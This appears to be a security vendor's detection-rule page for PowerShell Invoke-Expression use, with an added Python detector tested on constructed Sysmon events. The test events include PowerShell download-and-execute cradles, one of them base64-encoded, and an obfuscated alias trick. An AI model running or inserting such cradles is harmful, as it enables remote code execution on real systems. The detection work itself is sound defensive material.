Invoke-Expression Command

Anvilogic Forge

Summary
This detection rule identifies execution of the PowerShell cmdlet `Invoke-Expression`, which evaluates a string as PowerShell code and is therefore a convenient way to run arbitrary commands, including a payload fetched from the network at run time. Threat actors use it routinely to launch malicious scripts, and it appears in the tradecraft of several groups, among them Gamaredon (tracked by Microsoft as Actinium) and FIN7. The rule uses Sysmon process-creation events (Event ID 1) to flag process command lines that contain `invoke-expression` or its built-in alias `iex`. Capturing this lets an organization spot activity consistent with known attack patterns, particularly those used by nation-state and major cybercriminal groups against Windows environments. Two caveats for tuning: `Invoke-Expression` also appears in legitimate administrative scripts, so the rule should be paired with context such as parent process, user and network-facing arguments; and because the match is on the process command line, a call to `Invoke-Expression` from inside a script file, or one hidden behind an `-EncodedCommand` payload or an obfuscated alias lookup, is not seen by a plain string match.
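The following is an added example, not Anvilogic's rule code: a minimal Python re-implementation of the command-line match described above, run over constructed Sysmon Event ID 1 records. It assumes the events are dicts carrying the Sysmon fields `Image` and `CommandLine` (field names and sample values are constructed, not from the original page). It goes one step beyond the page by also decoding a `-EncodedCommand` payload, to show which variants a raw string match does and does not catch.

```python
"""Added example, not Anvilogic's rule code: a minimal re-implementation of the
Invoke-Expression detection, run over constructed Sysmon Event ID 1 records.

Assumptions (none are from the original page): events are dicts carrying the
Sysmon process-creation fields Image and CommandLine; the rule fires on the
command line of a PowerShell host only.
"""
import base64
import binascii
import re

# The cmdlet name or its built-in alias as a whole token, case-insensitive.
# The lookarounds stop 'iex' from matching inside words such as 'KpiExport'.
IEX_PATTERN = re.compile(r"(?<![\w$-])(?:invoke-expression|iex)(?![\w-])", re.IGNORECASE)

# -EncodedCommand and the shortened spellings powershell.exe accepts most often
# (-e, -ec, -enc), followed by a base64 blob. Not exhaustive: PowerShell takes
# any unambiguous prefix of the parameter name.
ENCODED_PATTERN = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

POWERSHELL_HOSTS = ("powershell.exe", "pwsh.exe")


def _is_powershell(record: dict) -> bool:
    """Restrict the rule to PowerShell hosts (assumed scope; cuts noise from other images)."""
    image = record.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    return image in POWERSHELL_HOSTS


def _decoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script carried by -EncodedCommand, or '' if none is present."""
    m = ENCODED_PATTERN.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except (binascii.Error, ValueError):
        return ""


def matches_command_line(record: dict) -> bool:
    """The rule as summarised above: Invoke-Expression or iex in the raw command line."""
    return _is_powershell(record) and bool(IEX_PATTERN.search(record.get("CommandLine", "")))


def matches_with_decoding(record: dict) -> bool:
    """Extension of the same check that also looks inside a -EncodedCommand payload."""
    if not _is_powershell(record):
        return False
    cmdline = record.get("CommandLine", "")
    return bool(IEX_PATTERN.search(cmdline) or IEX_PATTERN.search(_decoded_command(cmdline)))


def _encode_ps(script: str) -> str:
    """Base64 of the UTF-16LE script, as powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 0: download cradle calling the alias directly; fires on the raw command line.
    {"EventID": 1, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a.ps1')\""},
    # 1: the same cradle behind -EncodedCommand; only visible after decoding.
    {"EventID": 1, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -nop -enc " + _encode_ps(
         "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')")},
    # 2: benign admin script whose path contains 'iEx' inside a word; must not fire.
    {"EventID": 1, "Image": PS_IMAGE,
     "CommandLine": r"powershell.exe -File C:\Scripts\Import-KpiExport.ps1"},
    # 3: alias resolved at run time via a Get-Command wildcard; neither check fires,
    #    which is the blind spot of any command-line string match.
    {"EventID": 1, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -c \"&(gcm i*x) 'Get-Process'\""},
]


def run_rule(events, decode: bool = False) -> list:
    """Return the indexes of the events the rule fires on."""
    check = matches_with_decoding if decode else matches_command_line
    return [i for i, ev in enumerate(events) if check(ev)]


if __name__ == "__main__":
    print("raw command line only:", run_rule(SAMPLE_EVENTS))                        # [0]
    print("with -EncodedCommand decoding:", run_rule(SAMPLE_EVENTS, decode=True))   # [0, 1]
```

Event 3 is the one to keep in mind when tuning: the alias is never spelled out, so a detection built on the token `iex` has nothing to match, and coverage of that variant has to come from other telemetry, such as PowerShell script block logging (Event ID 4104), where the resolved command is recorded.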
Categories
  • Windows
  • Endpoint
Data Sources
  • Process
  • Windows Registry
ATT&CK Techniques
  • T1059.001
  • T1135
  • T1059.005
  • T1134.002
Created: 2024-02-09